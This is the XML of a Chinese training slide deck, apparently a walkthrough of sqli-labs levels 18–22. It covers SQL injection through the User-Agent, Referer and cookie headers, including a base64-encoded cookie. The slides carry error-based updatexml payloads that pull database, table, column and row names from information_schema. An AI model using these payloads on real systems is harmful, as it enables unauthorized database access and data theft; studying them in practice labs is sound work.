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457" r:id="rId2"/>
    <p:sldId id="1491" r:id="rId3"/>
    <p:sldId id="1485" r:id="rId4"/>
    <p:sldId id="1486" r:id="rId5"/>
    <p:sldId id="1487" r:id="rId6"/>
    <p:sldId id="1488" r:id="rId7"/>
    <p:sldId id="1489" r:id="rId8"/>
    <p:sldId id="1498" r:id="rId9"/>
    <p:sldId id="1499" r:id="rId1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4">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3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14"/>
        <p:guide pos="3684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60"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0F9B84EA-7D68-4D60-9CB1-D50884785D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6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靶场原理详解（五）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第十八关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5115" y="1436370"/>
            <a:ext cx="8897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这题和之前题目稍微有所区别，一进去他就显示了我们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，任何的网站同学都要时刻保持敏感，一旦发现他记录了你的浏览器信息或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息之类的你就应该想到头注入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2636520"/>
            <a:ext cx="6267450" cy="38385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请求头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95755" y="1772285"/>
            <a:ext cx="90176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User-Agent	</a:t>
            </a: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浏览器的身份标识字符串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Referer	</a:t>
            </a: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表示浏览器所访问的前一个页面，可以认为是之前访问页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的链接将浏览器带到了当前页面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Accept	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可接受的响应内容类型（Content-Types</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。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X-Forwarded-For</a:t>
            </a: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可以用来表示 HTTP 请求端真实 IP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Date			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发送该消息的日期和时间（以RFC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7231中定义的"HTTP日期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>			"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>格式来发送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en-US" altLang="zh-CN" dirty="0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972560" y="1664335"/>
            <a:ext cx="3810" cy="4212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十八关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8405" y="1772285"/>
            <a:ext cx="9776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'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,1,1)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 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,1,1)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 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,1,1)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 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,1,1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>-- qwe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第十九关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3720416" y="274462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6275" y="134048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这一关和上面做法相同，只是注入点的变化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208405" y="1772285"/>
            <a:ext cx="9776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'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,1,1)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 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,1,1)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 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,1,1)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 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,1,1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>-- qwe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第二十关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72335" y="1772285"/>
            <a:ext cx="7409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十二题我们点击登录之后会发现他记录了我们许多的信息，很重要的一点就是他下面同时也提示了我们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，那我们就可以从这里下手对他尝试注入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52245" y="3212465"/>
            <a:ext cx="9280525" cy="30911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第二十关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8405" y="1772285"/>
            <a:ext cx="9776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'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--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 'and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 'and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 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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二十一关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1455" y="1590675"/>
            <a:ext cx="897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这题看上去貌似和之前是一样的，登录之后同样会显示你的信息，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后面的值是被进行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码的，那么我吧我的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也进行一次编码，然后再做尝试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00150" y="2384425"/>
            <a:ext cx="9776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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> ‘and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)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and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 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)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and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 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and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二十二关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0150" y="2384425"/>
            <a:ext cx="97764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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> "and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and 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/>
              <a:t>1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/>
              <a:t>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 "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)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and 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 "and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)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and 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 "and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 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0195" y="1376680"/>
            <a:ext cx="888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这一题和前面做法一致，只是符号的区别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05,&quot;width&quot;:19230}"/>
</p:tagLst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1155</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>82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第十八关</vt:lpstr>
      <vt:lpstr>请求头</vt:lpstr>
      <vt:lpstr>十八关</vt:lpstr>
      <vt:lpstr>第十九关</vt:lpstr>
      <vt:lpstr>第二十关</vt:lpstr>
      <vt:lpstr>第二十关</vt:lpstr>
      <vt:lpstr>二十一关</vt:lpstr>
      <vt:lpstr>二十二关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3096</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-11T09:04:36Z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